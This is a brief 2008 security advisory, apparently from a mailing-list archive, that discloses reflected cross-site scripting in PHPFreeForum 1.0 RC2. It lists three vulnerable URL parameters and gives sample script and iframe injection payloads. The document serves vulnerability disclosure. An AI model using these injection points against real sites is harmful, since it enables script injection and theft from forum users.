PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability May 22 2008 08:26AM
tan_prathan hotmail com
==========================================================

PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability

==========================================================

AUTHOR : CWH Underground

DATE : 21 May 2008

SITE : www.citec.us

#####################################################

APPLICATION : PHPFreeForum

VERSION : 1.0 RC2

VENDOR : http://downloads.sourceforge.net/phpfreeforum/

#####################################################

---Exploit---

[-] http://[target]/[phpfreeforum_path]/html/error.php?message=<XSS>

[-] http://[target]/[phpfreeforum_path]/html/part/menu.php?nickname=<XSS>

[-] http://[target]/[phpfreeforum_path]/html/part/menu.php?randomid=<XSS>

Example for XSS :

<script>alert(123);</script>

<iframe src=http://www.google.com>

.

##################################################################

Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C

##################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus